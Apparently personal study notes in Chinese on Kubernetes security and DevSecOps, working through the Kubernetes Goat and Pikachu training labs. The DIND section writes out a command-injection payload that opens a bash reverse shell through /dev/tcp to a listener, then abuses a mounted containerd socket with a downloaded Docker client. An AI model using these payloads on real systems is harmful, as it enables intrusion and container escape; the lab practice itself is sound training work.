k8s云安全、devsecops等知识

1、参考课件复习云相关基础概念

2、使用minikube搭建k8s集群，并学习基础操作

3、搭建k8s-goat靶场，并参考官方文档和课件完成dind等场景的练习
拿到文件，则cd kubernetes-goat进入目录，修改 scenarios/internal-proxy/deployment.yaml 中CPU和内存值为300M，修改下面文件中映射的默认套接字scenarios/health-check/deployment.yaml，修改为/var/run/docker.sock

运行kubernetes-goat的K8S服务

bashsetup-kubernetes-goat.sh

启动应用服务的端口转发

bashaccess-kubernetes-goat.sh

访问1234端口，就可以看到全部的场景信息，搭建成功

k8s-goat的DIND啊，根据提示，访问1231端口

这是一个命令执行的页面，比如下图

我们执行监听ncat -lvvp 6666，接下来submit反弹shell：127.0.0.1;bash -c ‘bash -i >& /dev/tcp/192.168.40.128/6666 0>&1’，得到下图

执行mount命令，查看文件系统挂载情况

通过 /custom/containerd/containerd.sock 可以对 Docker 进行管理，查看套接字是否可用

下一步下载合适工具控制docker，查看目标系统的架构

根据操作系统架构和docker版本，下载对应的docker客户端

wgethttps://download.docker.com/linux/static/stable/x86_64/docker-26.1.1.tgz-O/tmp/docker.tar.gz

解压缩到临时目录

tar-xvf/tmp/docker.tar.gz-C/tmp/

执行 Docker 命令，挂载 sock，进行管理

/tmp/docker/docker-Hunix:///custom/containerd/containerd.sock images

4、复习devsecops相关概念和开源工具






SAST工具呢，可以看看Fortify和enkins集成-腾讯云开发社区、
jenkins用户手册、Fortify集成-Gitlab

参考基于开源工具实现软件成分分析SCA 和如何集成 Snyk 和 Bitbucket Cloud 以实现 DevSecOps

参考jenkins+Acunetix实现自动化安全测试 - 菜菜聊架构 - 博客园 (cnblogs.com)、Jenkins集成AppScan实现_jenkins scan-build-CSDN博客

参考IAST | 洞态文档 (dongtai.io)、IAST 扫描器 - OpenRASP 官方文档 - 开源自适应安全产品 (baidu.com)

5、复习nuclei工具的使用和poc编写，编写pikachu文件上传lou洞poc
根据自己系统情况下载使用
模板仓库

nuclei-h

这将显示Nuclei的帮助，以下是所有支持的命令。

nuclei编写pikachu靶场文件上传的poc啊，这里我用了ai，编写好后，执行如下图

手动访问以下URL（末尾文件名为实际检测到的文件名）：

• Client Check:http://pp.com/vul/unsafeupload/uploads/client_20260330_1200.php
• MIME Type:http://pp.com/vul/unsafeupload/uploads/server_20260330_1200.php
• GetImageSize:http://pp.com/vul/unsafeupload/uploads/2026/03/30/45257169ca672ef1ed5426189047.jpg
  前两种上传的文件，检验可执行性，点击跳转网页显示phpinfo，getimagesize则一片乌黑，那么前两种可执行，getimagesize不可执行
  

6、认真打磨个人简历
排版参照优秀简历模版，基本的必要属性写清楚明白，求职意向所需要的软硬实力也写明白，其他软硬实力是加分项，也补上有相关性的